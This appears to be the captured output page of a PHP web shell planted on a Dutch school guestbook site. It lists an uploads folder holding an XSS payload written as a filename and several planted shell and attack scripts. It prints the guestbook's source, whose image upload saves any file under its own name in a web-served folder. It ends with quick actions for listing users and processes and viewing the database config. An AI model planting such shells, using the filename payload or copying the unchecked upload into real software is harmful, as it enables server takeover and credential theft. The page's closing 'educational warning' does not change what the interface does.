🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ../index.php

<?php
session_start(); // Start the session
include 'connectie.php';

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $message = isset($_POST['message']) ? sanitizeInput($_POST['message']) : '';
}

function sanitizeInput($input) {
    // Remove leading and trailing whitespace
    $input = trim($input);
    
    // Convert special characters to HTML entities to prevent XSS attacks
    $input = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
    
    // Additional sanitization steps can be added here
    
    return $input;
}

// Function to upload a message to the database
function uploadMessage($image, $message, $name, $conn) {
    try {
        // Filter message and name to prevent script injection
        $message = htmlspecialchars($message);
        $name = htmlspecialchars($name);

        // Prepare SQL statement
        $stmt = $conn->prepare("INSERT INTO berichten (name, message, image, date_time) VALUES (:name, :message, :image, NOW())");
        
        // Bind parameters
        $stmt->bindParam(':name', $name);
        $stmt->bindParam(':message', $message);
        $stmt->bindParam(':image', $image);
        
        // Execute the query
        $stmt->execute();
        
        // Check if the query was successful
        if ($stmt->rowCount() > 0) {
            return true; // Message uploaded successfully
        } else {
            return false; // Failed to upload message
        }
    } catch(PDOException $e) {
        // Handle errors
        echo "Error: " . $e->getMessage();
        return false; // Failed to upload message
    }
}

// If the form is submitted
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // Check if all fields are filled
    if (!empty($_POST['name']) && !empty($_POST['message'])) {
        // Get the input data
        $name = $_POST['name'];
        $message = $_POST['message'];
        
        // Check if an image is uploaded
        $image = null;
        if (isset($_FILES['image']) && $_FILES['image']['error'] === UPLOAD_ERR_OK) {
            $image = $_FILES['image']['name'];
            move_uploaded_file($_FILES['image']['tmp_name'], "uploads/" . $image);
        }
        
        // Upload the message to the database
        if (uploadMessage($image, $message, $name, $pdo)) {
            header("Location: {$_SERVER['PHP_SELF']}", true, 303);
            exit();
        } else {
            echo "Failed to upload message.";
        }
    } else {
        echo "Please fill in all fields.";
    }
}

// Function to get messages from the database
function getMessages($conn) {
    try {
        // Prepare SQL statement
        $stmt = $conn->query("SELECT * FROM berichten ORDER BY date_time DESC");
        
        // Fetch all rows
        $messages = $stmt->fetchAll(PDO::FETCH_ASSOC);
        
        return $messages;
    } catch(PDOException $e) {
        // Handle errors
        echo "Error: " . $e->getMessage();
        return [];
    }
}

// Get messages from the database
$messages = getMessages($pdo);
?>


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Gastenboek</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4;
        }

        .container {
            max-width: 800px;
            margin: 20px auto; /* Add margin around the container */
            padding: 20px;
            background-color: #fff;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }

        .message {
            margin-bottom: 20px;
            padding: 10px;
            background-color: #f9f9f9;
            border-radius: 8px;
            box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
        }

        .message p {
            margin: 5px 0;
        }

        .message img {
            max-width: 100%;
            border-radius: 8px;
            max-height: 300px; /* Limiting maximum height */
        }

        form {
            margin-top: 20px; /* Move the form below the messages */
        }

        label {
            font-weight: bold;
        }

        input[type="text"],
        textarea {
            width: 100%;
            padding: 10px;
            margin-top: 5px;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-sizing: border-box;
        }

        input[type="submit"] {
            background-color: #4caf50;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }

        input[type="submit"]:hover {
            background-color: #45a049;
        }

        input[type="file"] {
            margin-top: 5px;
        }
    </style>
</head>
<body>
    <div class="container"> <!-- Add a container around all content -->
        <h1>Gastenboek</h1>
        <section class="send_form">
            <h2>Send a Message</h2>
            <form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>" method="post" enctype="multipart/form-data">
                <label for="name">Name:</label><br>
                <input type="text" id="name" name="name"><br>
                <label for="message">Message:</label><br>
                <textarea id="message" name="message" rows="4" cols="50"></textarea><br>
                <label for="image">Upload Image:</label><br>
                <input type="file" id="image" name="image"><br><br>
                <input type="submit" value="Send">
            </form>
        </section>
        <?php if (!empty($messages)): ?>
            <?php foreach ($messages as $message): ?>
                <div class="message">
                    <p><strong><?php echo htmlspecialchars($message['name']); ?>:</strong> <?php echo htmlspecialchars($message['message']); ?></p>
                    <?php if (!empty($message['image'])): ?>
                        <img src="uploads/<?php echo htmlspecialchars($message['image']); ?>" alt="Uploaded Image">
                    <?php endif; ?>
                    <p><em><?php echo htmlspecialchars($message['date_time']); ?></em></p>
                </div>
            <?php endforeach; ?>
        <?php else: ?>
            <p>No messages yet.</p>
        <?php endif; ?>
    </div>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!